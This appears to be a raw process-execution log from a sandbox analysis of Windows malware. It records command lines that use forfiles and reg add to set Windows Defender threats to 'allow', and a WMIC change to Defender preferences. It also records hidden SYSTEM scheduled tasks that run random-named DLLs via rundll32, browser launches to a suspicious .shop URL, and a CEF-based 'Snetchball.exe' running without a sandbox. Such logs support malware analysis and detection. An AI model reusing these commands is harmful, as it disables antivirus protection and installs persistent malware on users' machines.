"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\cmd.exe

/C powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\SysWOW64\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "bozJhwcBWfTIuPvJGw"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"

C:\Windows\SysWOW64\cmd.exe

/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\RYkefsiHU\WdGIBp.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "crLdjPbboKRrxLe" /V1 /F

C:\Windows\SysWOW64\Wbem\WMIC.exe

"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "crLdjPbboKRrxLe2" /F /xml "C:\Program Files (x86)\RYkefsiHU\QXOSJUk.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /END /TN "crLdjPbboKRrxLe"

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "crLdjPbboKRrxLe"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "uZMBBcqLgvQqCb" /F /xml "C:\Program Files (x86)\RXHKfDSqirfU2\VjmwrNA.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "zDqwIeVshbAQa2" /F /xml "C:\ProgramData\eAyGpXrokhrqbyVB\WzAHFIz.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "tPRAXBqzUUfWtUSpv2" /F /xml "C:\Program Files (x86)\zVzqvyOSihYKJvOyVZR\QsLDxyt.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "bnICqnIaulJfWHAOxOU2" /F /xml "C:\Program Files (x86)\MovZspCuTpPaC\BhIuTuG.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "abqDtlgLJZrFmRhwl" /SC once /ST 21:20:48 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\UvGNNHxtLtcCkoYu\GPCvYTTW\xqbhEQr.dll\",#1 /cVZjdidVg 757674" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "abqDtlgLJZrFmRhwl"

C:\Windows\system32\rundll32.EXE

C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\UvGNNHxtLtcCkoYu\GPCvYTTW\xqbhEQr.dll",#1 /cVZjdidVg 757674

C:\Windows\SysWOW64\rundll32.exe

C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\UvGNNHxtLtcCkoYu\GPCvYTTW\xqbhEQr.dll",#1 /cVZjdidVg 757674

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 636 -p 2388 -ip 2388

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2388 -s 2232

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "dRKdk1" /SC once /ST 19:24:08 /F /RU "Admin" /TR "\"C:\Program Files\Google\Chrome\Application\chrome.exe\" --restore-last-session"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 2388 -ip 2388

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2388 -s 1736

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "dRKdk1"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --restore-last-session

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "jhnbW1" /SC once /ST 11:22:06 /F /RU "Admin" /TR "\"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe\" --restore-last-session"

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "jhnbW1"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --restore-last-session

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "abqDtlgLJZrFmRhwl"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffae238ab58,0x7ffae238ab68,0x7ffae238ab78

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffae1cd46f8,0x7ffae1cd4708,0x7ffae1cd4718

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 2388 -ip 2388

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2388 -s 2020

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1612 --field-trial-handle=2460,i,8998513089586113364,3947514793912153758,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1952 --field-trial-handle=2460,i,8998513089586113364,3947514793912153758,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=1992 --field-trial-handle=2460,i,8998513089586113364,3947514793912153758,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3104 --field-trial-handle=2460,i,8998513089586113364,3947514793912153758,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3112 --field-trial-handle=2460,i,8998513089586113364,3947514793912153758,131072 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2172,1630939867207792627,8486829226328835937,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2196 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3452 --field-trial-handle=2460,i,8998513089586113364,3947514793912153758,131072 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2172,1630939867207792627,8486829226328835937,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2248 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,1630939867207792627,8486829226328835937,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2936 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,1630939867207792627,8486829226328835937,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2944 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2172,1630939867207792627,8486829226328835937,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3116 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,1630939867207792627,8486829226328835937,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3368 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=3720 --field-trial-handle=2460,i,8998513089586113364,3947514793912153758,131072 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument microsoft-edge:https://soneremonasez.shop/27844da3c568ad0171b0215c3223d7c0FW66Ze6GvDRWkFZlAckACzBeIowWpJM2HZo

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffae1cd46f8,0x7ffae1cd4708,0x7ffae1cd4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,1630939867207792627,8486829226328835937,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4208 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,1630939867207792627,8486829226328835937,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5428 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4584 --field-trial-handle=2460,i,8998513089586113364,3947514793912153758,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4908 --field-trial-handle=2460,i,8998513089586113364,3947514793912153758,131072 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,1630939867207792627,8486829226328835937,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2236 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,1630939867207792627,8486829226328835937,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4052 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4908 --field-trial-handle=2460,i,8998513089586113364,3947514793912153758,131072 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,1630939867207792627,8486829226328835937,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4604 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2172,1630939867207792627,8486829226328835937,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6312 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2172,1630939867207792627,8486829226328835937,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6312 /prefetch:8

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "jhnbW1"

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "dRKdk1"

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "IdVtZOOUCgewbUgTH"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 5312 -ip 5312

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5312 -s 976

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 7124 -ip 7124

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 7124 -s 2384

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,1630939867207792627,8486829226328835937,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6504 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,1630939867207792627,8486829226328835937,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5204 /prefetch:1

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.15" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2860 --field-trial-handle=2864,i,11822633312692198929,16466920673943323662,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:2

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.15" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3120 --field-trial-handle=2864,i,11822633312692198929,16466920673943323662,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:8

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.15" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3124 --field-trial-handle=2864,i,11822633312692198929,16466920673943323662,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:8

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.15" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --first-renderer-process --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3184 --field-trial-handle=2864,i,11822633312692198929,16466920673943323662,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.15" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3192 --field-trial-handle=2864,i,11822633312692198929,16466920673943323662,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,1630939867207792627,8486829226328835937,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4092 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,1630939867207792627,8486829226328835937,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6456 /prefetch:1

